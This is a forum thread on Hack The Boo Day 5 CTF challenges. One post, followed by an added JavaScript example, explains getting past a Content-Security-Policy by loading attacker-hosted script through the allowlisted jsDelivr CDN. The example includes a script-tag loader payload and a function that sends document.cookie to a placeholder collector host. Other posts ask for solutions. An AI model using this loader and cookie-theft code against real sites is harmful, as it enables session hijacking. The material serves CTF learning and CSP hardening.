[Hack The Boo] Day 5 Challenges
Great!
Reply
(October 26, 2022, 10:55 PM)lnf02 Wrote: Alright, bypassed all the fricking securities on the web...

You can inject an XSS payload on the "bot"; a simple <script>alert(1)</script> would work, but you have a lot of restrictions (CORS and CSP). But there's a "whitelisted domain", which is cdn.jsdelivr.net...

If you know a little about NPM and so on, you will find this page useful, because you can use the endpoint to redirect to files hosted on GitHub, WordPress, and the CDN itself...

You can host an xss.js file on your GH repository and add something like alert(1); you will finally trigger the alert, but you need the cookie...

Digging deep enough, you will finally find this repository: https://github.com/CanardMandarin/csp-bypass. It's a simple project that allows the bypass of CSP and (most important thing) "unsafe-eval", using a JS interpreter.

If you now create a script tag that points to that repository, you can execute a "query" to your IP, ngrok IP, webhook, whatever...

Finally, you will get something like this:


You can concatenate whatever you want, maybe the cookie (the flag is there...)... (if you read up to this part you will find a way to export the cookie, not so hard. I've already given you the hard part ;) )

Cheers, don't be a script kiddie or a leecher :D


cool
Reply
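As an added illustration of the CSP point in the quoted post (example code written for this page, not code from the thread or from the csp-bypass project), the block below parses a Content-Security-Policy header, checks whether a given script URL would be allowed by script-src, and then shows why allowlisting cdn.jsdelivr.net is effectively no restriction at all: the CDN's /gh/ endpoint serves any public GitHub repository, so the attacker's own file passes the check. The `attacker/payloads` repository, the `bot.example` page origin and the `collector.example` URL are placeholders, and the CSP strings are constructed for the demonstration.

```javascript
// Added example, not the thread's or the csp-bypass project's code.
// Repository, origin and collector names are placeholders (assumptions).

// Parse a Content-Security-Policy header into { directive: [sources...] }.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [directive, ...sources] = tokens;
    policy[directive.toLowerCase()] = sources;
  }
  return policy;
}

// Match one host-source expression (https://cdn.jsdelivr.net/npm/, *.jsdelivr.net, ...)
// against a parsed URL. Port matching is deliberately left out of this illustration.
function matchesHostSource(src, url) {
  let scheme = null;
  let rest = src;
  const m = /^([a-z][a-z0-9+.-]*):\/\/(.*)$/i.exec(src);
  if (m) { scheme = m[1].toLowerCase(); rest = m[2]; }
  if (scheme && scheme + ":" !== url.protocol) return false;
  const slash = rest.indexOf("/");
  const host = (slash >= 0 ? rest.slice(0, slash) : rest).toLowerCase();
  const path = slash >= 0 ? rest.slice(slash) : "";
  if (host === "*") {
    // any host
  } else if (host.startsWith("*.")) {
    if (!url.hostname.endsWith(host.slice(1))) return false;
  } else if (host !== url.hostname) return false;
  // A path ending in "/" is a prefix match; anything else must match exactly.
  if (path && (path.endsWith("/") ? !url.pathname.startsWith(path) : url.pathname !== path)) {
    return false;
  }
  return true;
}

// Would the browser run <script src=scriptUrl> under this policy? Handles 'none',
// 'self', scheme sources and host sources; nonces, hashes and 'strict-dynamic'
// are out of scope here.
function scriptAllowed(policy, scriptUrl, pageOrigin) {
  const sources = policy["script-src"] || policy["default-src"] || [];
  const url = new URL(scriptUrl);
  for (const src of sources) {
    if (src === "'none'") return false;
    if (src === "'self'") {
      if (url.origin === pageOrigin) return true;
      continue;
    }
    if (src.startsWith("'")) continue; // 'unsafe-inline', 'unsafe-eval', nonces, hashes
    if (/^[a-z][a-z0-9+.-]*:$/i.test(src)) {
      if (src.toLowerCase() === url.protocol) return true;
      continue;
    }
    if (matchesHostSource(src, url)) return true;
  }
  return false;
}

// jsDelivr exposes any public GitHub repository at /gh/<user>/<repo>@<ref>/<path>,
// which is the property the post relies on.
function jsdelivrGithubUrl(user, repo, ref, path) {
  return `https://cdn.jsdelivr.net/gh/${user}/${repo}@${ref}/${path.replace(/^\//, "")}`;
}

// The markup handed to the bot: nothing inline, just a script from the allowlisted CDN.
function loaderPayload(scriptUrl) {
  return `<script src="${scriptUrl}"></script>`;
}

// Exfiltration URL shape (kept pure so it can be checked outside a browser).
function exfilUrl(collector, cookie) {
  const u = new URL(collector);
  u.searchParams.set("c", cookie);
  return u.toString();
}

// What the hosted xss.js would do in the bot's browser; guarded so this file
// also runs under Node. Image loads are governed by img-src, so the collector
// must be allowed there (or a top-level navigation used instead).
function exfilCookie(collector) {
  if (typeof document === "undefined") return null;
  const target = exfilUrl(collector, document.cookie);
  new Image().src = target;
  return target;
}

const policy = parseCsp("default-src 'self'; script-src 'self' https://cdn.jsdelivr.net; img-src *");
const attackerScript = jsdelivrGithubUrl("attacker", "payloads", "main", "xss.js");
console.log(loaderPayload(attackerScript));
console.log("allowed by script-src:", scriptAllowed(policy, attackerScript, "https://bot.example"));
```

Two practical caveats follow from the model. First, narrowing the allowlist to a path prefix such as `https://cdn.jsdelivr.net/npm/somelib@1/` does defeat the /gh/ trick in this checker, but it only helps if no allowed path on the CDN can serve attacker-controlled content; nonces or hashes are the robust fix. Second, the missing `'unsafe-eval'` is what the csp-bypass interpreter in the post works around: the policy blocks `eval`/`new Function`, not code that was already loaded from an allowed origin and interprets a string itself. The exfil channel is separate from script loading: an `<img>` beacon needs img-src, `fetch` needs connect-src, while a plain `location = ...` navigation is not restricted by those fetch directives.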
bruh this cookie is not exporting LUL
Reply
(October 26, 2022, 10:55 PM)lnf02 Wrote: Alright, bypassed all the fricking securities on the web...

thx, good info.
Reply
(October 26, 2022, 01:05 PM)Hacker2222 Wrote: plz discuss here


nice
Reply
(October 26, 2022, 10:55 PM)lnf02 Wrote: Alright, bypassed all the fricking securities on the web...

thanks
Reply
thanks
Reply
any leads for crypto day 5?
Reply
(October 27, 2022, 08:32 AM)vash12 Wrote: any leads for crypto day 5?


I need 2 web and 2 pwn T_T
Reply
Here is the solution to the crypto:

Hidden Content


Also, I would appreciate it if someone shared the solutions for pwn 4 and 5.

Reply